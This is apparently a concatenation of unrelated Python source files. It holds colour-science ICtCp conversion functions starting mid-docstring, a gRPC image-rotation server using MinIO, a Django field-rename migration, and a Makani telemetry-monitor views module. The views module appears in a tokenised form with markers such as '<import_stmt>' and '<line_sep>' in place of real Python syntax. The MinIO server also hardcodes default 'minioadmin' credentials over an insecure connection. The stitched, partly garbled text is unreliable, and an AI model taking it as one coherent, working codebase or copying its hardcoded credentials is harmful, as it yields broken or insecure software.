        'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
        Computation method. See the :func:`RGB_to_ICtCp` definition for the
        description of the *Recommendation ITU-R BT.2100* variants.
    L_p : numeric, optional
        Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
        non-linear encoding. This parameter should stay at its default
        :math:`10000 cd/m^2` value for practical applications. It is exposed
        so that the definition can be used as a fitting function.

    Returns
    -------
    ndarray
        :math:`IC_TC_P` colour encoding array.

    Warnings
    --------
    The underlying *SMPTE ST 2084:2014* transfer function is an absolute
    transfer function.

    Notes
    -----
    -   The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are
        aliases for the *Dolby 2016* method.
    -   The underlying *SMPTE ST 2084:2014* transfer function is an absolute
        transfer function, thus the domain and range values for the
        *Reference* and *1* scales are only indicative that the data is not
        affected by scale transformations. The effective domain of *SMPTE ST
        2084:2014* inverse electro-optical transfer function (EOTF / EOCF)
        is [0.0001, 10000].

    +------------+-----------------------+------------------+
    | **Domain** | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``XYZ``    | ``UN``                | ``UN``           |
    +------------+-----------------------+------------------+

    +------------+-----------------------+------------------+
    | **Range**  | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``ICtCp``  | ``I``  : [0, 1]       | ``I``  : [0, 1]  |
    |            |                       |                  |
    |            | ``CT`` : [-1, 1]      | ``CT`` : [-1, 1] |
    |            |                       |                  |
    |            | ``CP`` : [-1, 1]      | ``CP`` : [-1, 1] |
    +------------+-----------------------+------------------+

    References
    ----------
    :cite:`Dolby2016a`, :cite:`Lu2016c`

    Examples
    --------
    >>> XYZ = np.array([0.20654008, 0.12197225, 0.05136952])
    >>> XYZ_to_ICtCp(XYZ)  # doctest: +ELLIPSIS
    array([ 0.0685809..., -0.0028384...,  0.0602098...])
    >>> XYZ_to_ICtCp(XYZ, method='ITU-R BT.2100-2 HLG')  # doctest: +ELLIPSIS
    array([ 0.5924279..., -0.0374073...,  0.2512267...])
    """

    BT2020 = RGB_COLOURSPACES['ITU-R BT.2020']

    # Adapt to the *ITU-R BT.2020* whitepoint and convert to linear RGB, then
    # delegate the encoding to RGB_to_ICtCp.
    RGB = XYZ_to_RGB(
        XYZ,
        illuminant,
        BT2020.whitepoint,
        BT2020.matrix_XYZ_to_RGB,
        chromatic_adaptation_transform,
    )

    return RGB_to_ICtCp(RGB, method, L_p)


def ICtCp_to_XYZ(ICtCp,
                 illuminant=CCS_ILLUMINANTS[
                     'CIE 1931 2 Degree Standard Observer']['D65'],
                 chromatic_adaptation_transform='CAT02',
                 method='Dolby 2016',
                 L_p=10000):
    """
    Converts from :math:`IC_TC_P` colour encoding to *CIE XYZ* tristimulus
    values.

    Parameters
    ----------
    ICtCp : array_like
        :math:`IC_TC_P` colour encoding array.
    illuminant : array_like, optional
        Source illuminant chromaticity coordinates.
    chromatic_adaptation_transform : unicode, optional
        **{'CAT02', 'XYZ Scaling', 'Von Kries', 'Bradford', 'Sharp',
        'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16',
        'Bianco 2010', 'Bianco PC 2010'}**,
        *Chromatic adaptation* transform.
    method : unicode, optional
        **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
        'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
        Computation method. See the :func:`RGB_to_ICtCp` definition for the
        description of the *Recommendation ITU-R BT.2100* variants.
    L_p : numeric, optional
        Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
        non-linear encoding. This parameter should stay at its default
        :math:`10000 cd/m^2` value for practical applications. It is exposed
        so that the definition can be used as a fitting function.

    Returns
    -------
    ndarray
        *CIE XYZ* tristimulus values.

    Warnings
    --------
    The underlying *SMPTE ST 2084:2014* transfer function is an absolute
    transfer function.

    Notes
    -----
    -   The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are
        aliases for the *Dolby 2016* method.
    -   The underlying *SMPTE ST 2084:2014* transfer function is an absolute
        transfer function, thus the domain and range values for the
        *Reference* and *1* scales are only indicative that the data is not
        affected by scale transformations.

    +------------+-----------------------+------------------+
    | **Domain** | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``ICtCp``  | ``I``  : [0, 1]       | ``I``  : [0, 1]  |
    |            |                       |                  |
    |            | ``CT`` : [-1, 1]      | ``CT`` : [-1, 1] |
    |            |                       |                  |
    |            | ``CP`` : [-1, 1]      | ``CP`` : [-1, 1] |
    +------------+-----------------------+------------------+

    +------------+-----------------------+------------------+
    | **Range**  | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``XYZ``    | ``UN``                | ``UN``           |
    +------------+-----------------------+------------------+

    References
    ----------
    :cite:`Dolby2016a`, :cite:`Lu2016c`

    Examples
    --------
    >>> ICtCp = np.array([0.06858097, -0.00283842, 0.06020983])
    >>> ICtCp_to_XYZ(ICtCp)  # doctest: +ELLIPSIS
    array([ 0.2065400...,  0.1219722...,  0.0513695...])
    >>> ICtCp = np.array([0.59242792, -0.03740730, 0.25122675])
    >>> ICtCp_to_XYZ(ICtCp, method='ITU-R BT.2100-2 HLG')
    ... # doctest: +ELLIPSIS
    array([ 0.2065400...,  0.1219722...,  0.0513695...])
    """

    # Decode to linear *ITU-R BT.2020* RGB first, then convert to *CIE XYZ*
    # with adaptation from the *ITU-R BT.2020* whitepoint to *illuminant*.
    RGB = ICtCp_to_RGB(ICtCp, method, L_p)

    BT2020 = RGB_COLOURSPACES['ITU-R BT.2020']

    XYZ = RGB_to_XYZ(
        RGB,
        BT2020.whitepoint,
        illuminant,
        BT2020.matrix_RGB_to_XYZ,
        chromatic_adaptation_transform,
    )

    return XYZ
from concurrent import futures
import logging
import os

import grpc
from PIL import Image, ImageOps

import helloworld_pb2
import helloworld_pb2_grpc
from minio import Minio

# Environment variable naming the MinIO endpoint (host:port).
minioEnvKey = "MINIO_ADDRESS"
image_name = 'img2.jpeg'
image2_name = 'img3.jpeg'
image_path = '/pulled_' + image_name
image_path2 = '/pulled_' + image2_name
responses = ["record_response", "replay_response"]

minioAddress = os.getenv(minioEnvKey)


class Greeter(helloworld_pb2_grpc.GreeterServicer):
    """Greeter servicer that pulls an image from MinIO and rotates it."""

    def SayHello(self, request, context):
        """Handle a SayHello RPC.

        Depending on ``request.name`` ("record", "replay" or anything else),
        a different image is fetched from the ``mybucket`` MinIO bucket and
        rotated by 90 degrees (the rotated image is discarded -- this is a
        benchmark workload); a greeting naming the chosen response is
        returned.
        """
        if minioAddress is None:  # was `== None`; identity test is correct
            # No object store configured: nothing to fetch. Returning None
            # preserves the original behaviour (gRPC reports an RPC error).
            return None
        minioClient = Minio(minioAddress,
                            access_key='minioadmin',
                            secret_key='minioadmin',
                            secure=False)
        # Select the greeting subject and which image to process; the three
        # original branches only differed in these values.
        if request.name == "record":
            subject, obj, path = responses[0], image_name, image_path
        elif request.name == "replay":
            subject, obj, path = responses[1], image2_name, image_path2
        else:
            subject, obj, path = request.name, image_name, image_path
        msg = 'Hello, %s!' % subject
        minioClient.fget_object('mybucket', obj, path)
        # CPU work: rotate the pulled image; the rotated copy is not saved.
        Image.open(path).transpose(Image.ROTATE_90)
        return helloworld_pb2.HelloReply(message=msg)


def serve():
    """Run the gRPC server on port 50051 until terminated."""
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
    helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
    server.add_insecure_port('[::]:50051')
    server.start()
    server.wait_for_termination()


if __name__ == '__main__':
    logging.basicConfig()
    serve()
# Generated by Django 1.11.20 on 2019-06-12 06:41
from django.db import migrations


class Migration(migrations.Migration):
    """Rename ``enable_stream_sounds`` on ``UserProfile``.

    The field becomes ``enable_stream_audible_notifications``; this is a
    pure column rename, so no data migration is required.
    """

    # Must run after the stream message retention migration.
    dependencies = [
        ("zerver", "0229_stream_message_retention_days"),
    ]

    operations = [
        migrations.RenameField(
            model_name="userprofile",
            old_name="enable_stream_sounds",
            new_name="enable_stream_audible_notifications",
        ),
    ]
# Copyright 2020 Makani Technologies LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """View functions to interact with web clients."""<import_stmt>atexit<import_stmt>json<import_stmt>logging<import_stmt>os<import_stmt>re<import_stmt>string<import_stmt>time<import_from_stmt>django http<import_from_stmt>django shortcuts<import_from_stmt>django template<import_from_stmt>django.core urlresolvers<import_from_stmt>makani.analysis.checks log_util<import_from_stmt>makani.avionics.network message_type<as>aio_message_type<import_from_stmt>makani.avionics.network network_config<import_from_stmt>makani.gs.monitor2.apps.layout autogen<import_from_stmt>makani.gs.monitor2.apps.layout base<as>layout_base<import_from_stmt>makani.gs.monitor2.apps.layout layout_util<import_from_stmt>makani.gs.monitor2.apps.layout loader<import_from_stmt>makani.gs.monitor2.apps.layout memory<as>layout_memory<import_from_stmt>makani.gs.monitor2.apps.layout stoplights<import_from_stmt>makani.gs.monitor2.apps.layout widgets<import_from_stmt>makani.gs.monitor2.apps.receiver receiver_manager<import_from_stmt>makani.gs.monitor2.apps.receiver views<as>receiver_views<import_from_stmt>makani.gs.monitor2.project settings<import_from_stmt>makani.lib.bazel bazel_util<import_from_stmt>makani.lib.python c_helpers<import_from_stmt>makani.lib.python debug_util<import_from_stmt>makani.lib.python struct_tree<import_from_stmt>makani.lib.python.h5_utils 
h5_io<import_stmt>numpy<line_sep>MESSAGE_TYPE_HELPER=c_helpers.EnumHelper('MessageType' aio_message_type)<line_sep>CONFIG_FILES={'plot_defs':os.path.join(settings.MONITOR_PATH 'configs/plot_defs.json') }<def_stmt>Home request<block_start>"""Get the response for the home page."""<line_sep>layout_names=loader.LayoutLoader().Names()<line_sep>layout_names.sort()<line_sep>all_layouts=[{'name':layout 'url':urlresolvers.reverse('view_aio_layout' args=[loader.LayoutLoader().ModuleName(layout)])}<for>layout layout_names]<line_sep>context={'layouts':all_layouts 'canvas_cols':settings.CSS_GRID_COLUMNS }<line_sep>_CreateAndAddClientIdToContext(context)<line_sep>template_name='home.html'<line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end><def_stmt>_ListFiles path_arg<block_start>"""List files under a local path."""<line_sep>path_template=string.Template(path_arg)<line_sep>prefix_path=path_template.substitute(os.environ)<line_sep>sub_paths=os.listdir(prefix_path)<line_sep><return>prefix_path sub_paths<block_end><def_stmt>_GetFullFilePath prefix_path sub_path<block_start><return>os.path.join(prefix_path sub_path)<block_end><def_stmt>SelectAllLogs request<block_start>"""Select all logs in the last visited directory."""<line_sep>current_path=request.session['current_path']<try_stmt><block_start>prefix_path,sub_paths=_ListFiles(current_path)<block_end><except_stmt>OSError<block_start><return>http.HttpResponse('Cannot list directory "%s"!'%current_path)<block_end>file_list=[]<for_stmt>sub_path sorted(sub_paths)# Construct the full path. 
<block_start><if_stmt>sub_path.endswith('.h5')<and><not>sub_path.startswith('format')<block_start>full_path=_GetFullFilePath(prefix_path sub_path)<if_stmt><not>os.path.isdir(full_path)<block_start>file_list.append(full_path)<block_end><block_end><block_end><return>http.HttpResponse(';\n'.join(file_list))<block_end><def_stmt>Console request command args<block_start>"""Take commandlines from the client and respond with console outputs. Args: request: The HTML resquest object. command: The command to be run. Only 'ls' is permitted for now. args: The string of arguments to the command. Returns: The HttpResponse telling the output of the command. """<if_stmt>command<ne>'ls'<block_start>message='Command "%s" is not allowed.'%command<line_sep><return>http.HttpResponse(message)<block_end>arg_template=string.Template(args)<line_sep>arg_path=arg_template.safe_substitute({'MAKANI_HOME':bazel_util.GetWorkspaceRoot()})<try_stmt><block_start>prefix_path,sub_paths=_ListFiles(arg_path)<line_sep>request.session['current_path']=arg_path<block_end><except_stmt>OSError<block_start><return>http.HttpResponse('Cannot list directory "%s"!'%arg_path)<block_end>file_list=[]<for_stmt>sub_path sorted(sub_paths)# Construct the full path. <block_start>full_path=_GetFullFilePath(prefix_path sub_path)<if_stmt>os.path.isdir(full_path)# If this is a directory, add the javascript to allow users to click # into it. <block_start>file_list.append('<a href="javascript:void(0)" onclick="onListFiles(\'%s\')">%s</a>'%(full_path sub_path))<block_end><elif_stmt>sub_path.endswith('.h5')<and><not>sub_path.startswith('format')# If this is an HDF5 file, add the javascript to allow users to # visualize it. 
<block_start>file_list.append('<a href="javascript:void(0)" onclick="onAddLog(\'%s\')">%s</a>'%(full_path sub_path))<block_end><else_stmt><block_start>file_list.append(sub_path)<block_end><block_end>text='<br>'.join(file_list)<line_sep><return>http.HttpResponse(text)<block_end><def_stmt>_GetMinMessageFrequency <block_start>"""Get the minimum frequency across all message types."""<line_sep>config=network_config.NetworkConfig(settings.NETWORK_YAML)<line_sep><return>min(m.frequency_hz<for>m config.all_messages<if>m.frequency_hz<g>0)<block_end><def_stmt>_TryToEnforceAioReceiver client_id<block_start>"""Ensure that the client is subscribed to the AioReceiver."""<line_sep># TODO: Investigate always running the AioReceiver. message_receiver=receiver_manager.ReceiverManager.GetReceiver(client_id)<if_stmt><not>message_receiver<block_start><if_stmt>receiver_manager.ReceiverManager.CheckAndStartAioReceiver(client_id receiver_views.CreateAioReceiver)# A new AioReceiver is started. # Get the longest period for all messages, and multiply it by two to # make sure we do not miss any message. <block_start>time.sleep(2.0/_GetMinMessageFrequency())<block_end><return>receiver_manager.ReceiverManager.GetReceiver(client_id)<block_end><else_stmt><block_start><return>message_receiver<block_end><block_end><def_stmt>ViewMessageType request client_id message_type template_name='monitor.html'<block_start>"""View information within a message by automatically generating a layout. Args: request: An HttpRequest from the client. client_id: The ID of the client's browser tab. message_type: The Enum name of a message type. template_name: The HTML template used to render the layout. Returns: An HttpResponse in the format of a serialized JSON object. 
"""<line_sep>configs=_LoadConfigs()<line_sep>_TryToEnforceAioReceiver(client_id)<line_sep>resp=_GetMessage(request client_id message_type)<line_sep>resp=resp.Data(convert_to_basic_types=<true>)<if>resp<else>{}<line_sep>configs['scenarios']=autogen.GenerateScenario(resp message_type)<line_sep>context=_PrepareContext(configs)<line_sep>new_client_id=_CreateAndAddClientIdToContext(context)<line_sep>context['periodic_url']='/dashboard/periodic/msg_enum/%s/%s'%(new_client_id message_type)<line_sep>context['content_width']=settings.CSS_GRID_COLUMNS<line_sep>context['order_horizontally']=<true><line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end><def_stmt>UpdateMessageOptions unused_request client_id<block_start>"""Detect what messages have been received and update the client. Args: unused_request: An HttpRequest from the client. client_id: The ID of the client's browser tab. Returns: An HttpResponse about a dictionary of {message_enum: message_short_name} """<line_sep>message_receiver=_TryToEnforceAioReceiver(client_id)<line_sep>info=message_receiver.GetReceivedMessageTypes()<if>message_receiver<else>[]<line_sep><return>http.HttpResponse(json.dumps(info))<block_end><def_stmt>ViewAioLayout request layout_name<block_start>"""Open a monitor layout that get data from AIO. Args: request: An HttpRequest from the client. layout_name: Name of the layout associated with the client. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>context={'receiver_type':'aio'}<line_sep><return>_ViewLayout(request layout_name context)<block_end><def_stmt>BrowseLog request path<block_start>"""Browse the log by expanding the field at `path`. Args: request: An HttpRequest from the client. path: A path pointing to one field in the log. Returns: An HttpResponse serializing a list of names for child fields. 
"""<line_sep># The log structure may differ across logs, we always use the first log to # construct the log structure. log_path=request.session['log_paths'][0]<line_sep>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<try_stmt><block_start>skeleton=log_data.Skeleton(path depth=1)<block_end><except_stmt>h5_io.H5IndexError<block_start><return>http.HttpResponse('{}')<block_end>parent_path=path<line_sep>d3_data=struct_tree.DictToD3Tree(skeleton '.' parent_path)<if_stmt>'children'<in>d3_data# The first layer is a placeholder. Starts from the second layer. <block_start><return>http.HttpResponse(json.dumps(d3_data['children']))<block_end><else_stmt><block_start><return>http.HttpResponse('{}')<block_end><block_end><def_stmt>ViewLogStructure request paths template_name='log_structure.html'<block_start>"""View structure of an HDF5 log at given log path. Args: request: An HttpRequest from the client. paths: Paths to the local log files. template_name: The HTML template used to render the layout. Returns: An HttpResponse that renders the log structure. """<line_sep># `context` includes variables used to render the HTML. 
context={'graph_width':6000 'graph_height':6000 'frame_width':200 'frame_height':540 'canvas_cols':12 }<line_sep>log_paths=[]<for_stmt>path paths.split(';')<block_start>path=path.strip()<if_stmt><not>path<block_start><continue><block_end>path_template=string.Template(path)<line_sep>log_path=path_template.substitute(os.environ)<line_sep>basename=os.path.basename(log_path)<if_stmt>basename.startswith('(')<and>basename.endswith(')')<block_start>dirname=os.path.dirname(log_path)<line_sep>regex_pattern=re.compile(basename[1:-1]+'$')<line_sep>filenames=os.listdir(dirname)<line_sep>matched_files=[f<for>f filenames<if>regex_pattern.match(f)]<line_sep>log_paths<augadd>[os.path.join(dirname f)<for>f matched_files]<block_end><else_stmt><block_start>log_paths.append(log_path)<block_end><block_end><if_stmt><not>log_paths<block_start>context['errors']='Cannot find log data'<block_end><else_stmt># Use the first log to index fields. <block_start>log_data=struct_tree.StructTree(log_paths[0] fail_silently=<true> readonly=<true>)<line_sep>log_skeleton=log_data.Skeleton(depth=1)<line_sep>d3_data=struct_tree.DictToD3Tree(log_skeleton '/')<line_sep>d3_data['expand_url']=urlresolvers.reverse('browse_log' args=[''])<line_sep>request.session['log_paths']=log_paths<line_sep>context['skeleton']=json.dumps(d3_data)<block_end>order_horizontally=<true><line_sep>configs=_LoadConfigs()<line_sep>scenarios=layout_base.AssembleLayout([('Signals' [widgets.DictLinesWidget('series' <none> interactive=<true> use_markers=<true>) ]) ] desired_view_cols=1 
order_horizontally=order_horizontally)<line_sep>layout_names=loader.LayoutLoader().ModuleNames()<line_sep>layout_names.sort()<line_sep>configs['scenarios']=scenarios<line_sep>context.update(_PrepareContext(configs))<line_sep>context['layout_names']=layout_names<line_sep>context['content_width']=settings.CSS_GRID_COLUMNS-2<line_sep>context['order_horizontally']=order_horizontally<line_sep>_CreateAndAddClientIdToContext(context)<line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end><def_stmt>PeriodicDataPoll request client_id layout_name<block_start>"""Compute realtime data and respond to periodic polling from a client layout. Args: request: An HttpRequest from the client. client_id: The ID of the client's browser tab. layout_name: Name of the layout associated with the client. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>aggregated_message=_GetMessage(request client_id)<if_stmt><not>aggregated_message<block_start>aggregated_message=struct_tree.StructTree({} fail_silently=<true> readonly=<true>)<block_end>layout=loader.LayoutLoader().GetLayoutByModuleName(layout_name)<line_sep>tab_memory=layout_memory.GetMemory(client_id <false>)<if_stmt>tab_memory<is><not><none># Load the persistent memory. <block_start>layout.Import(tab_memory)<block_end><else_stmt><block_start>layout.Initialize()<line_sep>tab_memory=layout_memory.GetMemory(client_id <true>)<block_end># Start the AIO receiver in case the server has restarted. _TryToEnforceAioReceiver(client_id)<try_stmt><block_start>data=layout.Filter(aggregated_message)<block_end><except_stmt>Exception# pylint: disable=broad-except # layout.Filter may introduce any kind of exception. <block_start>logging.error('PeriodicDataPoll encountered an error:\n%s' debug_util.FormatTraceback())<line_sep>layout.Export(tab_memory)<line_sep><return>http.HttpResponse('{}')<block_end># Save the persistent memory. 
layout.Export(tab_memory)<line_sep>resp=data.Json()<if_stmt>settings.DEBUG<block_start>resp['__message__']='\n-----------------------------\n'.join('Error in indicator "%s":\n%s'%(k v)<for>k,v layout.ErrorReport())<block_end>resp_str=json.dumps(resp)<line_sep>layout.ClearErrors()<line_sep><return>http.HttpResponse(resp_str)<block_end><def_stmt>_DownSample data length<block_start>window_size=max(1 len(data)/length)<if_stmt>window_size<g>1<block_start>data=data[:len(data)/window_size<times>window_size]<line_sep><return>numpy.mean(data.reshape(-1 window_size) 1) window_size<block_end><else_stmt><block_start><return>data 1<block_end><block_end><def_stmt>GetLogData request mode fields<block_start>"""Get values of data fields within a log file."""<line_sep>log_paths=request.session['log_paths']<line_sep>fields=[f.strip()<for>f fields.split('\n')<if>f.strip()]<line_sep>field_labels=layout_util.GetDistinguishableNames(fields '.' ['kAioNode' 'kMessageType'])<if_stmt>mode<eq>'merge'<block_start>series=ConcatenateLogData(log_paths field_labels)<block_end><else_stmt># By default, mode = 'compare' <block_start>series=CompareLogData(log_paths field_labels)<block_end>resp={'series':series}<line_sep><return>http.HttpResponse(json.dumps(resp))<block_end><def_stmt>_StringReplace subject translate<block_start><for_stmt>s,t translate<block_start>subject=subject.replace(s t)<block_end><return>subject<block_end><def_stmt>GetMessageSnapshot request client_id title<block_start>aggregated_message=_GetMessage(request client_id)<line_sep>result=aggregated_message.Data(<true>)<line_sep>response=http.HttpResponse(content_type='text/plain')<line_sep>response['Content-Disposition']=('attachment; filename=snapshot_%s.json'%title)<line_sep>response.write(json.dumps(result indent=2))<line_sep><return>response<block_end><def_stmt>GetRawLogData request fields<block_start>"""Get values of data fields within a log file."""<line_sep>log_paths=request.session['log_paths']<line_sep>fields=[f.strip()<for>f 
fields.split('\n')<if>f.strip()]<line_sep>field_labels=layout_util.GetDistinguishableNames(fields '.' ['kAioNode' 'kMessageType'])<line_sep>result={}<line_sep># Remove special characters so variables can be parsed and loaded into Matlab. bad_chars=['.' ',' '-' '+' '(' ')' '[' ']' '{' '}' ':' 'kMessageType' 'kAioNode' 'messages' 'message']<line_sep>replacement=list(zip(bad_chars ['_']<times>len(bad_chars)))<line_sep>replacement=[('[:]' '') (':,' '') (' ' '')]+replacement<for_stmt>log_path log_paths<block_start>base_name=os.path.basename(log_path)<line_sep>log_name='log_'+_StringReplace(base_name[:base_name.find('.')] replacement)<line_sep>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<line_sep>result[log_name]={}<for_stmt>field,legend_label field_labels.iteritems()<block_start>data,timestamps=log_util.GetOrderedDedupDataAndTimeByField(log_data field rebase=<false>)<line_sep>result[log_name][_StringReplace(legend_label replacement)]={'values':data.tolist()<if>data<is><not><none><else><none> 'timestamps':timestamps.tolist()<if>timestamps<is><not><none><else><none> 'status':'success'<if>data<is><not><none><else>'missing' }<block_end><block_end>response=http.HttpResponse(content_type='text/plain')<line_sep>response['Content-Disposition']='attachment; filename=makani_log_data.json'<line_sep>response.write(json.dumps(result indent=2))<line_sep><return>response<block_end><def_stmt>ConcatenateLogData log_paths field_labels<block_start>"""Get series of data, each corresponding to field values in all logs."""<line_sep>series={}<line_sep>base_timeline=float('inf')<for_stmt>log_path log_paths<block_start>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<for_stmt>field,legend_label field_labels.iteritems()<block_start>data,timestamps=log_util.GetOrderedDedupDataAndTimeByField(log_data field rebase=<false>)<if_stmt>data<is><none><or>timestamps<is><none><block_start><continue><block_end>base_timeline=min(base_timeline 
float(timestamps[0]))<if_stmt>legend_label<not><in>series<block_start>series[legend_label]={'x':timestamps 'y':data}<block_end><else_stmt><block_start>series[legend_label]['x']=numpy.concatenate((series[legend_label]['x'] timestamps))<line_sep>series[legend_label]['y']=numpy.concatenate((series[legend_label]['y'] data))<block_end><block_end><block_end>result={}<for_stmt>field,legend_label field_labels.iteritems()<block_start>timestamps,_=_DownSample(series[legend_label]['x'] settings.MAX_DATA_POINTS_PER_LOG_FIELD)<line_sep>data,downsample_rate=_DownSample(series[legend_label]['y'] settings.MAX_DATA_POINTS_PER_LOG_FIELD)<if_stmt>downsample_rate<g>1<block_start>legend_label<augadd>'(/%d)'%downsample_rate<block_end>result[legend_label]={'x':(timestamps-base_timeline).tolist() 'y':data.tolist()}<block_end><return>result<block_end><def_stmt>CompareLogData log_paths field_labels<block_start>"""Get series of data, each corresponding to field values within a log."""<line_sep>series={}<line_sep>base_timeline=float('inf')<for_stmt>log_path log_paths<block_start>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<line_sep>log_name=os.path.basename(log_path)<if_stmt>'.'<in>log_name<block_start>log_name=log_name[:log_name.rfind('.')]<block_end><for_stmt>field,legend_label field_labels.iteritems()<block_start>data,timestamps=log_util.GetOrderedDedupDataAndTimeByField(log_data field rebase=<true>)<if_stmt>data<is><none><or>timestamps<is><none><block_start><continue><block_end>data,_=_DownSample(data settings.MAX_DATA_POINTS_PER_LOG_FIELD)<line_sep>timestamps,downsample_rate=_DownSample(timestamps settings.MAX_DATA_POINTS_PER_LOG_FIELD)<line_sep>base_timeline=min(base_timeline float(timestamps[0]))<line_sep>short_name='%s.%s'%(log_name legend_label)<if_stmt>downsample_rate<g>1<block_start>short_name<augadd>'(/%d)'%downsample_rate<block_end>series[short_name]={'x':timestamps 'y':data.tolist()}<block_end><block_end><for_stmt>short_name 
series<block_start>series[short_name]['x']=(series[short_name]['x']-base_timeline).tolist()<block_end><return>series<block_end><def_stmt>PeriodicMessagePoll request client_id message_type=<none><block_start>"""Retrieve realtime data and respond to periodic polling from a message view. Args: request: An HttpRequest from the client. client_id: The ID of the client's browser tab. message_type: The Enum name of a message type. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>resp=_GetMessage(request client_id message_type)<if_stmt><not>resp<block_start>resp={}<block_end><else_stmt><block_start>resp=resp.Data(convert_to_basic_types=<true>)<block_end>resp_str=json.dumps(resp)<line_sep><return>http.HttpResponse(resp_str)<block_end><def_stmt>_LoadConfigs <block_start>"""Load default layout configuration parameters."""<line_sep>configs={}<for_stmt>cf,filename CONFIG_FILES.iteritems()<block_start><with_stmt>open(filename 'r')<as>fp<block_start>configs[cf]=json.load(fp)<block_end><block_end><if_stmt>'plot_defs'<not><in>configs<block_start>logging.Error('Missing definitions for plotting javascripts.')<block_end><return>configs<block_end><def_stmt>_PrepareContext configs<block_start>"""Prepare the context to render the layout."""<line_sep>context={}<line_sep>fig_templates=set()<line_sep>canvas_cols=configs['scenarios']['canvas']['grid_width']<line_sep>context['canvas_cols']=canvas_cols<line_sep>row_height_px=configs['scenarios']['canvas']['row_height_px']<line_sep>ui_objs=[]<line_sep>max_cols=canvas_cols<for_stmt>stripe configs['scenarios']['views']<block_start><for_stmt>view stripe['stripe']<block_start>view['canvas_cols']=int(float(view['grid_width'])/stripe['grid_width']<times>canvas_cols+0.5)<for_stmt>indicator 
view['indicators']<block_start>ui_obj=indicator<if_stmt>'rows'<not><in>ui_obj<block_start>ui_obj['height']='auto'<block_end><else_stmt><block_start>rows=ui_obj['rows']<line_sep>ui_obj['height']=str(rows<times>row_height_px)+'px'<block_end><if_stmt>'cols'<not><in>ui_obj<block_start>ui_obj['cols']=max_cols<block_end># TODO: Change `id` to 'indicator_id', and 'selector' # to 'dom_selector'. ui_obj['id']='ui_obj_%s'%len(ui_objs)<line_sep>ui_obj['selector']='#%s'%(ui_obj['id'])<line_sep>ui_objs.append(ui_obj)<line_sep>fig_templates.add(ui_obj['template'])<block_end><block_end><block_end>context['fig_templates']=fig_templates<line_sep>context['plot_defs']=configs['plot_defs']<line_sep>context['views']=configs['scenarios']['views']<line_sep>context['ui_objs_str']=json.dumps(ui_objs)<line_sep>context['stoplight_error']=stoplights.STOPLIGHT_ERROR<line_sep>context['stoplight_warning']=stoplights.STOPLIGHT_WARNING<line_sep>context['stoplight_normal']=stoplights.STOPLIGHT_NORMAL<line_sep>context['stoplight_unavailable']=stoplights.STOPLIGHT_UNAVAILABLE<line_sep>context['stoplight_any']=stoplights.STOPLIGHT_ANY<line_sep><return>context<block_end><def_stmt>_GetMessage unused_request client_id message_type=<none><block_start>"""Get a message from the receiver."""<line_sep>message_receiver=receiver_manager.ReceiverManager.GetReceiver(client_id)<line_sep>resp=struct_tree.StructTree({} fail_silently=<true> readonly=<true>)<if_stmt>message_receiver<block_start><if_stmt>message_type<is><not><none><block_start>message_enum=MESSAGE_TYPE_HELPER.Value(message_type)<block_end><else_stmt><block_start>message_enum=<none><block_end>resp=message_receiver.GetLatest(message_enum)<block_end><return>resp<block_end><def_stmt>_CreateAndAddClientIdToContext context<block_start>client_id=receiver_manager.ReceiverManager.GetNewClientId()<line_sep>context['client_id']=client_id<line_sep><return>client_id<block_end><def_stmt>_ViewLayout request layout_name extra_context=<none><block_start>"""Get a 
monitor layout according to `layout_name`."""<line_sep>layout=loader.LayoutLoader().GetLayoutByModuleName(layout_name)<if_stmt>layout<is><none><block_start><return>http.HttpResponseRedirect(urlresolvers.reverse('home'))<block_end>layout.Initialize()<line_sep>configs=_LoadConfigs()<line_sep>configs['scenarios']=layout.Scenario()<line_sep>context=_PrepareContext(configs)<line_sep>client_id=_CreateAndAddClientIdToContext(context)<line_sep># Initialize the layout. layout.Export(layout_memory.GetMemory(client_id <true>))<line_sep># Add polling URL. context['periodic_url']='/dashboard/periodic/layout/%s/%s'%(client_id layout_name)<line_sep>context['layout_name']=layout_name<line_sep>context['content_width']=settings.CSS_GRID_COLUMNS<line_sep>context['order_horizontally']=layout.OrderHorizontally()<line_sep>context['default_font_size']=layout.DefaultFontSize()<line_sep>context['sim_mode']=settings.POPULATE_MESSAGES_FROM_SIM<if_stmt>extra_context<block_start>context.update(extra_context)<block_end>template_name='monitor.html'<line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end>
